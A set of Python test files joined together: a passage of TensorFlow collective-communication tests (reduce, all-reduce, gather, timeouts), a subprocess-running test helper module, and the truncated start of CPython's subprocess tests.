CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], reduce_op=[ReduceOp.SUM, ReduceOp.MEAN], prefer_unique_instance_key=[True, False])) def testBatchReduceDense(self, num_processes, required_gpus, implementation, reduce_op, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") options = self.RunOptions( num_processes=num_processes, gpus_per_process=required_gpus, reduce_op=reduce_op, communication_options=collective_util.Options( implementation=implementation), prefer_unique_instance_key=prefer_unique_instance_key) group_size = options.num_processes * (options.gpus_per_process or 1) inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]] inputs = inputs_data[0:group_size] if group_size == 1: expect = [1.0, 2.0] if group_size == 2: expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0] elif group_size == 4: expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0] self.batch_reduce_and_verify(inputs, expect, options) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], # TODO(b/166682130): add MEAN reduce once the bug is fixed. reduce_op=ReduceOp.SUM, prefer_unique_instance_key=[True, False])) def testBatchReduceSparse(self, num_processes, required_gpus, implementation, reduce_op, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") options = self.RunOptions( mode=["func_graph"], # Sparse reduce is not supported in eager. num_processes=num_processes, gpus_per_process=required_gpus, reduce_op=reduce_op, communication_options=collective_util.Options( implementation=implementation), prefer_unique_instance_key=prefer_unique_instance_key) group_size = options.num_processes * (options.gpus_per_process or 1) inputs_data = ([ IndexedSlicesValue( values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]), IndexedSlicesValue( values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1]) ], [ IndexedSlicesValue( values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]), IndexedSlicesValue( values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1]) ], [ IndexedSlicesValue( values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]), IndexedSlicesValue( values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1]) ], [ IndexedSlicesValue( values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]), IndexedSlicesValue( values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1]) ]) inputs = inputs_data[0:group_size] if group_size == 1: expect = [ IndexedSlices( values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]), IndexedSlices( values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1]) ] if group_size == 2: expect = [ IndexedSlices( values=[[1.], [2.], [5.], [6.]], indices=[0, 1, 1, 2], dense_shape=[10, 1]), IndexedSlices( values=[[3.], [4.], [7.], [8.]], indices=[1, 2, 0, 1], dense_shape=[5, 1]) ] elif group_size == 4: expect = [ IndexedSlices( values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]], indices=[0, 1, 1, 2, 3, 4, 8, 9], dense_shape=[10, 1]), IndexedSlices( values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]], indices=[1, 2, 0, 1, 3, 4, 3, 4], dense_shape=[5, 2]) ] self.batch_reduce_and_verify(inputs, expect, options) def testBatchReduceMixedDenseAndSparse(self): options = self.RunOptions( num_processes=2, gpus_per_process=0, reduce_op=ReduceOp.SUM, mode=["func_graph"]) inputs_data = [ [ 1.0, 2.0, IndexedSlicesValue( values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]), IndexedSlicesValue( values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1]) ], [ 3.0, 4.0, IndexedSlicesValue( values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]), IndexedSlicesValue( values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1]) ], ] expect = [ 4.0, 6.0, IndexedSlices( values=[[1.], [2.], [5.], [6.]], indices=[0, 1, 1, 2], dense_shape=[10, 1]), IndexedSlices( values=[[3.], [4.], [7.], [8.]], indices=[1, 2, 0, 1], dense_shape=[5, 1]) ] self.batch_reduce_and_verify(inputs_data, expect, options) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], reduce_op=[ReduceOp.SUM, ReduceOp.MEAN], )) def testAllReduceDense(self, num_processes, required_gpus, implementation, reduce_op): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") def replica_fn(): collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) group_size = num_processes * (required_gpus or 1) @def_function.function def collective_all_reduce(): results = [] for replica_id, device in enumerate(devices): with ops.device(device): value = constant_op.constant(1.0) results.append( collective._all_reduce(reduce_op, value, replica_id, options)) return results got = collective_all_reduce() if reduce_op == ReduceOp.SUM: expect = [1.0 * group_size] * len(devices) elif reduce_op == ReduceOp.MEAN: expect = [1.0] * len(devices) self.assertAllClose(got, expect) @def_function.function def collective_batch_all_reduce(): results = [] for replica_id, device in enumerate(devices): with ops.device(device): value = (constant_op.constant(1.0), constant_op.constant(2.0)) results.append( collective._all_reduce(reduce_op, value, replica_id, options)) return results got = collective_batch_all_reduce() if reduce_op == ReduceOp.SUM: expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices) elif reduce_op == ReduceOp.MEAN: expect = [(1.0, 2.0)] * len(devices) self.assertAllClose(got, expect) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], reduce_op=[ReduceOp.SUM, ReduceOp.MEAN], )) def testAllReduceSparse(self, num_processes, required_gpus, implementation, reduce_op): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") if (num_processes == 2 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip NCCL + 2 processes combination. NCCL requires " "physical GPUs for every process.") def replica_fn(): collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) group_size = num_processes * (required_gpus or 1) @def_function.function def collective_all_reduce(): results = [] for replica_id, device in enumerate(devices): with ops.device(device): value = IndexedSlices( values=array_ops.identity([[1.]]), indices=array_ops.identity([0]), dense_shape=array_ops.identity([5, 1])) results.append( collective._all_reduce(reduce_op, value, replica_id, options)) return results got = collective_all_reduce() if reduce_op == ReduceOp.SUM: expect = [IndexedSlices([[1. * group_size]], [0], [5, 1]) ] * len(devices) elif reduce_op == ReduceOp.MEAN: expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices) self.assertAllClose( nest.map_structure(ops.convert_to_tensor, got), nest.map_structure(ops.convert_to_tensor, expect)) @def_function.function def collective_batch_all_reduce(): results = [] for replica_id, device in enumerate(devices): with ops.device(device): value = (IndexedSlices( array_ops.identity([[1.]]), array_ops.identity([0]), array_ops.identity([5, 1])), IndexedSlices( array_ops.identity([[3.]]), array_ops.identity([2]), array_ops.identity([5, 1]))) results.append( collective._all_reduce(reduce_op, value, replica_id, options)) return results got = collective_batch_all_reduce() if reduce_op == ReduceOp.SUM: expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]), IndexedSlices([[3. * group_size]], [2], [5, 1])) ] * len(devices) elif reduce_op == ReduceOp.MEAN: expect = [(IndexedSlices([[1.]], [0], [5, 1]), IndexedSlices([[3.]], [2], [5, 1]))] * len(devices) self.assertAllClose( nest.map_structure(ops.convert_to_tensor, got), nest.map_structure(ops.convert_to_tensor, expect)) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=0, implementation=CommunicationImplementation.AUTO, reduce_op=ReduceOp.SUM)) def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus, implementation, reduce_op): def replica_fn(): collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) group_size = num_processes * (required_gpus or 1) @def_function.function def collective_batch_all_reduce(): results = [] for replica_id, device in enumerate(devices): with ops.device(device): value = (IndexedSlices( array_ops.identity([[1.]]), array_ops.identity([0]), array_ops.identity([5, 1])), array_ops.identity(1.0), IndexedSlices( array_ops.identity([[3.]]), array_ops.identity([2]), array_ops.identity([5, 1])), array_ops.identity(2.0)) results.append( collective._all_reduce(reduce_op, value, replica_id, options)) return results got = collective_batch_all_reduce() expect = [ (IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size, IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size) ] * len(devices) self.assertAllClose( nest.map_structure(ops.convert_to_tensor, got), nest.map_structure(ops.convert_to_tensor, expect)) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], axis=[0, 1, 2], func_mode=["eager", "func_graph"], implementation=[ CommunicationImplementation.AUTO, CommunicationImplementation.RING, CommunicationImplementation.NCCL, ], prefer_unique_instance_key=[True, False])) def testAllGatherSameShape(self, num_processes, required_gpus, implementation, func_mode, axis, prefer_unique_instance_key): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32) def gather_fn(): per_replica_value = make_per_replica_value(value, devices) gathered_values = collective._gather( per_replica_value, per_replica_value, axis=axis, options=options) gathered_values = self.as_list(gathered_values) # Skip checking devices in eager. In eager the device attribute doesn't # reflect the actual device of the tensor. if not context.executing_eagerly(): self.assertAllEqual(devices, [v.device for v in gathered_values]) return [ops.convert_to_tensor(v) for v in gathered_values] group_size = num_processes * (required_gpus or 1) expect = array_ops.concat([value] * group_size, axis=axis) per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices) if func_mode == "eager": result = gather_fn() self.assertAllClose(result, per_replica_expect) if func_mode == "func_graph": result = def_function.function(gather_fn)() self.assertAllClose(result, per_replica_expect) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=[1, 2], required_gpus=[0, 1, 2], implementation=[CommunicationImplementation.RING])) def testCollectiveV2ControlFlow(self, num_processes, required_gpus, implementation): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = True collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) value = make_per_replica_value(constant_op.constant([1.]), devices) @def_function.function def reduce_fn(): def cond_body(): reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value, options) return math_ops.add_n(self.as_list(reduced)) / len(devices) return control_flow_ops.cond( array_ops.identity(False), cond_body, cond_body) num_replicas = num_processes * len(devices) self.assertAllEqual(reduce_fn(), [1. * num_replicas]) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=1, required_gpus=2, implementation=[ CommunicationImplementation.NCCL, CommunicationImplementation.RING ], prefer_unique_instance_key=[True, False])) def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) # We would like to simulate the following sequence: # thread-0 device0 device1 # thread-1 device0 device1 # If the kernel launch sequence is as-is the program will deadlock since # NCCL requires the launch order to be same on each device. v0 = make_per_replica_value(1.0, devices) v1 = make_per_replica_value(2.0, devices) # Add a delay to collective_ops.all_reduce according to the input tensors # index in `sequence.` sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]] all_reduce = collective_ops.all_reduce def delayed_all_reduce(input_tensor, *args, **kwargs): for idx, v in enumerate(sequence): if input_tensor is v: time.sleep(idx) break return all_reduce(input_tensor, *args, **kwargs) with test.mock.patch.object(collective_ops, "all_reduce", delayed_all_reduce): # We only use NCCL for batch reduce with two or more values, so we use # two values here. def thread_fn(): reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v0, v0), (v0, v0)], options) self.assertAllEqual(reduced[0].values, [2.0, 2.0]) self.assertAllEqual(reduced[1].values, [2.0, 2.0]) t = threading.Thread(target=thread_fn) t.start() reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1), (v1, v1)], options) self.assertAllEqual(reduced[0].values, [4.0, 4.0]) self.assertAllEqual(reduced[1].values, [4.0, 4.0]) t.join() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=1, required_gpus=2, implementation=[ CommunicationImplementation.NCCL, CommunicationImplementation.RING ], prefer_unique_instance_key=[True, False])) def testInputsAreFunctionArgs(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) @def_function.function def reduce_fn(v): # Function inputs don't have device placement. self.assertEqual(v.values[0].device, "") self.assertEqual(v.values[1].device, "") # We only use NCCL for batch reduce with two or more values, so we use # two values here. reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) self.assertEqual(reduced[0].values[0].device, devices[0]) self.assertEqual(reduced[0].values[1].device, devices[1]) self.assertEqual(reduced[1].values[0].device, devices[0]) self.assertEqual(reduced[1].values[1].device, devices[1]) # Returning Mirrored only evaluates the primary value, which causes # hanging, return [reduced[0].values, reduced[1].values] v = make_per_replica_value(1.0, devices) reduced = reduce_fn(v) self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]]) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutReduceDense(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value(1.0, devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def reduce_dense(): return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options) # The collective should time out because we only launch it on worker-0, # while there're three workers in total. with self.assertRaises(errors.DeadlineExceededError): reduce_dense() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutBatchReduceDense(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value(1.0, devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def batch_reduce_dense(): return collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. with self.assertRaises(errors.DeadlineExceededError): batch_reduce_dense() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutReduceSparse(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value( IndexedSlicesValue( values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def reduce_sparse(): return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. with self.assertRaises(errors.DeadlineExceededError): reduce_sparse() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutBatchReduceSparse(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value( IndexedSlicesValue( values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def batch_reduce_sparse(): return collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. with self.assertRaises(errors.DeadlineExceededError): batch_reduce_sparse() get_global_mpr(num_processes).run(replica_fn) @combinations.generate(combinations.combine(num_processes=1, required_gpus=2)) def testNcclOrdering(self, num_processes, required_gpus): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = True CollectiveReplicaLauncher._prefer_ordering_token = True collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options( implementation=CommunicationImplementation.NCCL) v_dense = make_per_replica_value([1.0, 1.0], devices) v_sparse = make_per_replica_value([ IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]), IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]), ], devices) @def_function.function def nested_dense(): collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) @def_function.function def nested_sparse(): collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # All collectives, function calls, if clause and while loops should be # chained by control dependencies, so that the execution order is # deterministic. @def_function.function def f(): # pylint: disable=pointless-statement collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reducing dense value. collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) # reducing sparse value. collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reduce dense value in nested tf.function. nested_dense() # reduce sparse value in nested tf.function. nested_sparse() # reduce dense value in tf.cond. if array_ops.identity(1.0) > array_ops.identity(2.0): collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) else: v_dense # reduce sparse value in tf.cond. if array_ops.identity(1.0) > array_ops.identity(2.0): v_sparse else: collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reduce dense value in tf.while_loop. i = array_ops.identity(1) while i < 3: collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) i += 1 # reduce sparse value in tf.while_loop. i = array_ops.identity(1) while i < 3: collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) i += 1 # reducing dense and sparse value again. collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # pylint: enable=pointless-statement graph = f.get_concrete_function().graph should_be_ordered = set([ "CollectiveReduceV2", "CollectiveGatherV2", "If", "While", "StatefulPartitionedCall" ]) nodes_by_device = {} for op in graph.get_operations(): if op.type in should_be_ordered: if op.device not in nodes_by_device: nodes_by_device[op.device] = [] nodes_by_device[op.device].append(op) order = test_util.topological_sort_operations(graph.get_operations()) for device in devices: device = device_util.canonicalize(device) # Those function ops don't have device annotations, but they contain # collectives for both devices so we always include them. operations = nodes_by_device[device] + nodes_by_device[""] # Verify that we get all types of nodes we want. self.assertEqual(set(op.type for op in operations), should_be_ordered) test_util.assert_sequential_execution(order, operations) get_global_mpr(num_processes).run(replica_fn) if __name__ == "__main__": # Set default inter op thread pool size to one to ensure we don't exhaust the # thread pool with the additional executors to run collectives in eager. os.environ["TF_NUM_INTEROP_THREADS"] = "1" # TODO(b/172304955): figure why logical devices doesn't work. test_util.main(config_logical_devices=False)
utils.py
# -*- coding: utf-8 -*- from __future__ import division import os import sys import socket import signal import functools import atexit import tempfile from subprocess import Popen, PIPE, STDOUT from threading import Thread try: from Queue import Queue, Empty except ImportError: from queue import Queue, Empty from time import sleep try: import simplejson as json except ImportError: import json from .exceptions import CommandError, TimeoutWaitingFor ON_POSIX = 'posix' in sys.builtin_module_names # Directory relative to basetest module location CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Location of binary files (usually the src/ folder) BIN_PREFIX = os.path.abspath( os.path.join(CURRENT_DIR, "..", "..", "src") ) # Default location of test certificates DEFAULT_CERT_PATH = os.path.abspath( os.path.join(CURRENT_DIR, "..", "test_certs") ) # Default location of test extensions DEFAULT_EXTENSION_PATH = os.path.abspath( os.path.join(CURRENT_DIR, "..", "test_extensions") ) # Environment flags to control skipping of vramsteg tests VRAMSTEG_SKIP = os.environ.get("VRAMSTEG_SKIP", False) # Environment flags to control use of PATH or in-tree binaries VRAMSTEG_USE_PATH = os.environ.get("VRAMSTEG_USE_PATH", False) UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}") def vramsteg_binary_location(cmd="vramsteg"): """ ../src/ is used by default. """ return os.path.join(BIN_PREFIX, cmd) return binary_location(cmd, VRAMSTEG_USE_PATH) def binary_location(cmd, USE_PATH=False): """ ../src/ is used by default. """ return os.path.join(BIN_PREFIX, cmd) def wait_condition(cond, timeout=1, sleeptime=.01): """Wait for condition to return anything other than None """ # NOTE Increasing sleeptime can dramatically increase testsuite runtime # It also reduces CPU load significantly if timeout is None: timeout = 1 if timeout < sleeptime: print("Warning, timeout cannot be smaller than", sleeptime) timeout = sleeptime # Max number of attempts until giving up tries = int(timeout / sleeptime) for i in range(tries): val = cond() if val is not None: break sleep(sleeptime) return val def wait_process(pid, timeout=None): """Wait for process to finish """ def process(): try: os.kill(pid, 0) except OSError: # Process is dead return True else: # Process is still ticking return None return wait_condition(process, timeout) def _queue_output(arguments, pidq, outputq): """Read/Write output/input of given process. This function is meant to be executed in a thread as it may block """ kwargs = arguments["process"] input = arguments["input"] try: proc = Popen(**kwargs) except OSError as e: # pid None is read by the main thread as a crash of the process pidq.put(None) outputq.put(( "", ("Unexpected exception caught during execution: '{0}' . ".format(e)), 255)) # false exitcode return # Put the PID in the queue for main process to know. pidq.put(proc.pid) # Send input and wait for finish out, err = proc.communicate(input) if sys.version_info > (3,): out, err = out.decode('utf-8'), err.decode('utf-8') # Give the output back to the caller outputq.put((out, err, proc.returncode)) def _retrieve_output(thread, timeout, queue, thread_error): """Fetch output from binary subprocess queues """ # Try to join the thread on failure abort thread.join(timeout) if thread.isAlive(): # Join should have killed the thread. This is unexpected raise TimeoutWaitingFor(thread_error + ". Unexpected error") # Thread died so we should have output try: # data = (stdout, stderr, exitcode) data = queue.get(timeout=timeout) except Empty: data = TimeoutWaitingFor("streams from program") return data def _get_output(arguments, timeout=None): """Collect output from the subprocess without blocking the main process if subprocess hangs. """ # NOTE Increase this value if tests fail with None being received as # stdout/stderr instead of the expected content output_timeout = 0.1 # seconds pidq = Queue() outputq = Queue() t = Thread(target=_queue_output, args=(arguments, pidq, outputq)) t.daemon = True t.start() try: pid = pidq.get(timeout=timeout) except Empty: pid = None # Process crashed or timed out for some reason if pid is None: return _retrieve_output(t, output_timeout, outputq, "Program to start") # Wait for process to finish (normal execution) state = wait_process(pid, timeout) if state: # Process finished return _retrieve_output(t, output_timeout, outputq, "Program thread to join") # If we reach this point we assume the process got stuck or timed out for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL): # Start with lower signals and escalate if process ignores them try: os.kill(pid, signal.SIGABRT) except OSError as e: # 3 means the process finished/died between last check and now if e.errno != 3: raise # Wait for process to finish (should die/exit after signal) state = wait_process(pid, timeout) if state: # Process finished return _retrieve_output(t, output_timeout, outputq, "Program to die") # This should never happen but in case something goes really bad raise OSError("Program stopped responding and couldn't be killed") def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=False, env=os.environ, timeout=None): "Run a subprocess and wait for it to finish" if input is None: stdin = None else: stdin = PIPE if merge_streams: stderr = STDOUT else: stderr = PIPE arguments = { "process": { "args": cmd, "stdin": stdin, "stdout": stdout, "stderr": stderr, "bufsize": 1, "close_fds": ON_POSIX, "env": env, }, "input": input, } out, err, exit = _get_output(arguments, timeout) if merge_streams: if exit != 0: raise CommandError(cmd, exit, out) else: return exit, out else: if exit != 0: raise CommandError(cmd, exit, out, err) else: return exit, out, err def run_cmd_wait_nofail(*args, **kwargs): "Same as run_cmd_wait but silence the exception if it happens" try: return run_cmd_wait(*args, **kwargs) except CommandError as e: return e.code, e.out, e.err def memoize(obj): """Keep an in-memory cache of function results given it's inputs """ cache = obj.cache = {} @functools.wraps(obj) def memoizer(*args, **kwargs): key = str(args) + str(kwargs) if key not in cache: cache[key] = obj(*args, **kwargs) return cache[key] return memoizer try: from shutil import which which = memoize(which) except ImportError: # NOTE: This is shutil.which backported from python-3.3.3 @memoize def which(cmd, mode=os.F_OK | os.X_OK, path=None): """Given a command, mode, and a PATH string, return the path which conforms to the given mode on the PATH, or None if there is no such file. `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result of os.environ.get("PATH"), or can be overridden with a custom search path. """ # Check that a given file can be accessed with the correct mode. # Additionally check that `file` is not a directory, as on Windows # directories pass the os.access check. def _access_check(fn, mode): return (os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)) # If we're given a path with a directory part, look it up directly # rather than referring to PATH directories. This includes checking # relative to the current directory, e.g. ./script if os.path.dirname(cmd): if _access_check(cmd, mode): return cmd return None if path is None: path = os.environ.get("PATH", os.defpath) if not path: return None path = path.split(os.pathsep) if sys.platform == "win32": # The current directory takes precedence on Windows. if os.curdir not in path: path.insert(0, os.curdir) # PATHEXT is necessary to check on Windows. pathext = os.environ.get("PATHEXT", "").split(os.pathsep) # See if the given file matches any of the expected path # extensions. This will allow us to short circuit when given # "python.exe". If it does match, only test that one, otherwise we # have to try others. if any(cmd.lower().endswith(ext.lower()) for ext in pathext): files = [cmd] else: files = [cmd + ext for ext in pathext] else: # On other platforms you don't have things like PATHEXT to tell you # what file suffixes are executable, so just pass on cmd as-is. files = [cmd] seen = set() for dir in path: normdir = os.path.normcase(dir) if normdir not in seen: seen.add(normdir) for thefile in files: name = os.path.join(dir, thefile) if _access_check(name, mode): return name return None def parse_datafile(file): """Parse .data files, treating files as JSON """ data = [] with open(file) as fh: for line in fh: line = line.rstrip("\n") # Turn [] strings into {} to be treated properly as JSON hashes if line.startswith('[') and line.endswith(']'): line = '{' + line[1:-1] + '}' if line.startswith("{"): data.append(json.loads(line)) else: data.append(line) return data def mkstemp(data): """ Create a temporary file that is removed at process exit """ def rmtemp(name): try: os.remove(name) except OSError: pass f = tempfile.NamedTemporaryFile(delete=False) f.write(data) f.close() # Ensure removal at end of python session atexit.register(rmtemp, f.name) return f.name def mkstemp_exec(data): """Create a temporary executable file that is removed at process exit """ name = mkstemp(data) os.chmod(name, 0o755) return name # vim: ai sts=4 et sw=4
f3290e217fbb989a3843f8659f6af3d704f81a01174d5c8e6e7a4e0acfed2401.py
import unittest from test import test_support import subprocess import sys import signal import os import errno import tempfile import time import re import sysconfig try: import resource except ImportError: resource = None try: import threading except ImportError: threading = None mswindows = (sys.platform == "win32") # # Depends on the following external programs: Python # if mswindows: SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), ' 'os.O_BINARY);') else: SETBINARY = '' class BaseTestCase(unittest.TestCase): def setUp(self): # Try to minimize the number of children we have so this test # doesn't crash on some buildbots (Alphas in particular). test_support.reap_children() def tearDown(self): for inst in subprocess._active: inst.wait() subprocess._cleanup() self.assertFalse(subprocess._active, "subprocess._active not empty") def assertStderrEqual(self, stderr, expected, msg=None): # In a debug build, stuff like "[6580 refs]" is printed to stderr at # shutdown time. That frustrates tests trying to check stderr produced # from a spawned Python process. actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr) self.assertEqual(actual, expected, msg) class PopenTestException(Exception): pass class PopenExecuteChildRaises(subprocess.Popen): """Popen subclass for testing cleanup of subprocess.PIPE filehandles when _execute_child fails. """ def _execute_child(self, *args, **kwargs): raise PopenTestException("Forced Exception for Test") class ProcessTestCase(BaseTestCase): def test_call_seq(self): # call() function with sequence argument rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(rc, 47) def test_check_call_zero(self): # check_call() function with zero return code rc = subprocess.check_call([sys.executable, "-c", 